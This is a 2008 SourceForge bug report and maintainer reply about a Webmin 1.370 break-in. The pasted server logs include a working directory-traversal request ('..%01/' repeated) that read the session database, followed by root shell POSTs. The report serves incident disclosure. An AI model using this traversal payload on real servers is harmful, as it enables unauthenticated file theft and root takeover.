Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office.

Close

#3020 Webimn cracked through GET /unauthenticated/

1.370
closed-fixed
nobody
None
5
2008-01-15
2008-01-15
biland
No

I don't know if this is really a bug but I will report it.
I had webmin 1.370 with default install on Fedora Core (installed with yum).
I found this in file: /var/webmin/miniserv.log:

59.106.21.107 - - [12/Jan/2008:23:05:15 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/webmin/sessiondb.pag HTTP/1.1" 200 1024
59.106.21.107 - - [12/Jan/2008:23:05:16 -0500] "GET /unauthenticated//..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/log/sessiondb.pag HTTP/1.1" 404 32
59.106.21.107 - root [12/Jan/2008:23:05:58 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
59.106.21.107 - root [12/Jan/2008:23:06:00 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059
61.7.231.67 - root [12/Jan/2008:23:31:54 -0500] "POST /shell/index.cgi HTTP/1.1" 200 12059

It seems through this special request the attacker grabed the file /var/webmin/sessiondb.pag and figured it out the root password from there.

Discussion

  • Jamie Cameron
    Jamie Cameron
    2008-01-15

    Logged In: YES
    user_id=129364
    Originator: NO

    Yes, some older Webmin versions had a security hole just like this. I tested this attack against 1.390, and it doesn't work any more - in fact, I'm pretty sure that it didn't work in 1.370 either. Are you sure you weren't using an older version at some time?

    Regardless, the latest release is definately not vulnerable to this bug.

     
  • Jamie Cameron
    Jamie Cameron
    2008-01-15

    • status: open --> closed-fixed